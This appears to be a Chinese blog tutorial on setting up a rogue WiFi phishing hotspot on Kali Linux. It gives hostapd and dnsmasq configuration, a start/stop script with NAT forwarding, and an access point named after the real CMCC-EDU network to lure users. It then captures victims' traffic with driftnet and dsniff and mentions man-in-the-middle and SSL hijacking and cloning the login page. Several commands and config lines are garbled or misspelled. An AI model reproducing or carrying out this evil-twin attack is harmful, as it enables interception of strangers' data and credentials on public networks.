kali下搭建WiFi釣魚熱點

linux下的無線共享要用到兩個軟件：hostapd(創(chuàng)建無線熱點)、dnsmasq(dns服務(wù)和dhcp服務(wù)).

1. 安裝以上兩個軟件：

apt-get install hostapd
apt-getinstalldnsmasq

2. 配置hostapd.conf文件

很多教程上說配置/etc/hostapd/hostapd.conf文件，但是初次配置時，在/etc/hostapd/下并沒有發(fā)現(xiàn)這個文件。

好吧，用linux的強(qiáng)大查找功能吧：

# find -name hostapd

靠，沒有。這個可以有！趕緊google一下，在網(wǎng)上可以直接找到hostapd.conf文件，如果直接copy下來放到/etc/hostapd/來可能版本不同不兼容。

想了想，應(yīng)該在/etc/(畢竟是個配置文件)，在到/etc/下找找吧：

/etc# find -name hostapd
發(fā)現(xiàn)以下文件：
./default/hostapd
./init.d/hostapd
./hostapd
./network/if-post-down.d/hostapd
./network/if-pre-up.d/hostapd

進(jìn)去看看：

在該文件中發(fā)現(xiàn)了hpstapd.conf.gz文件，它 的位置是/usr/share/doc/hostapd/examples/

好吧，應(yīng)該找到了，只是壓縮了，解壓吧。注意還要修改上圖的文件，將#DAEMON_CONF=“”修改成上圖形式的（我的已經(jīng)修改好了）。

DAEMON_CONF=/etc/hostapd/hostapd.conf

保存并退出，將 hpstapd.conf.gz復(fù)制到/etc/hostapd/下：

#cp/usr/share/doc/hostapd/examples/hostapd.conf.gz/etc/hostapd/

進(jìn)入/etc/hostapd/目錄下，解壓：

/etc/hostapd# gzip -d hostapd.conf.gz > hostapd.conf

現(xiàn)在可以編輯hostapd.conf文件了：

#cd/etc/hostapd
/etc/hostapd# vim ./hostapd.conf

去掉前面的注釋（去‘#’），并修改以下的：

interface=wlan2             //設(shè)置要做為AP的網(wǎng)卡
driver=nl80211              //設(shè)置無線網(wǎng)卡驅(qū)動，一般都是這樣（也可以具體的，如rtl871xdrv）
ssid=CMCC-EDU               //設(shè)置熱點的名稱，CMCC-EDU你總該連吧～
hw_mode=g                   //（默認(rèn)）無線模式，這里是默認(rèn)的
channel=6                   //無線頻道（1、6、11三個頻道互補(bǔ)干擾)
macaddr_acl=0               //(默認(rèn))MAC地址過濾規(guī)則，設(shè)置為0即有規(guī)則的話就啟用
auth_algs=1                 //設(shè)置為開放無線模式

其他的默認(rèn)就好，當(dāng)然你也可以仔細(xì)研究這個hostapd.conf文件（如果你的E文好的話...），最后會說說支持WPA加密的設(shè)置。

接下來，是配置dnsmasq.conf文件：

vim/etc/dnsmasq.conf

修改為如下圖形式：

設(shè)置內(nèi)核支持IP轉(zhuǎn)發(fā)，編輯/etc/sysctl.conf文件，去掉“# net.ipv4.ip_forward=1”前面的#去掉：

現(xiàn)在就可以啟動我們設(shè)置好的偽造熱點了，這里直接寫成了一個腳本：

#! /bin/bash


case $1 in
    "start")
       sleep 1
       ifconfig wlan2 192.168.10.1 netmask 255.255.255.0         //無線熱點的接口wlan2
       sleep 1
       echo "1" >/proc/sys/net/ipv4/ip_forward
       sleep 1
       iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE     //這里我上網(wǎng)的網(wǎng)卡是wlan0,如果是網(wǎng)線的話就是eth0
       sleep 1
       /etc/init.d/hostapd start
       sleep 1
       /etc/init.d/dnsmasq start
    ;;
    "stop")
       /etc/init.d/dnsmasq stop
       /etc/init.d/hostapd stop
       sleep 1
       iptables -t nat -D POSTROUTING -o wlan0 -j MASQUERADE     //同上
       sleep 1
       echo "0" >/proc/sys/net/ipv4/ip_forward
       sleep 1
    ;;
    *)
       echo "Usage $0 {start|stop}"
    ;;
    esac

取個名字AP-wlan0,再給它加個可運(yùn)行權(quán)限，并放到/etc/init.d/下：

chmod+x./AP-wlan0
cp ./AP-wlan0 /etc/init.d

啟動服務(wù)腳本：

service AP-wlan0 start

啟動之后，如圖（）：

好了，手機(jī)連接上試試～～

由于我這有CMCC-EDU的無線信號，為了便于區(qū)分，我把偽造的熱點改為CMCC-EDUU，

用driftnet抓去網(wǎng)頁圖片看看：

driftnet -i wlan2

效果很明顯哦^_^,driftnet還可以捕獲音頻的哦，詳細(xì)去看說明吧

當(dāng)然，這個時候打開dsniff和wireshark的話，所有的數(shù)據(jù)都可以抓下來了，中間人攻擊、ssl等各種劫持都可以哦，這個我也在研究。。。

dsniff指定端口嗅探：

dsniff -i wlan2 -t 21/tcp=ftp,80/tcp=http

由于我這里在克隆CMCC-EDU登錄界面時，它做的有點變態(tài)，還得修改點，所以暫時先寫到這了

PS:下一步就該輪到我的樹莓派上場了，親看下回分解`_`

補(bǔ)充的：

配置hostapd.conf文件支持WPA加密:

interface=wlan2
driver=nl80211
ssid=mywifi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
ieee80211n=1
wpa=2                                //WPA2加密模式
wpa_passphrase=mimanicai             //密碼（即wifi密碼）
wpa_key_mgmt=WPA-PSK
wpa-pairwise=TKIP
rns-pairwise=CCMP


//其他的默認(rèn)，kali默認(rèn)用vim時是沒有高亮顯示的，建議設(shè)置成高亮的以便于查找，怎么設(shè)，自己google吧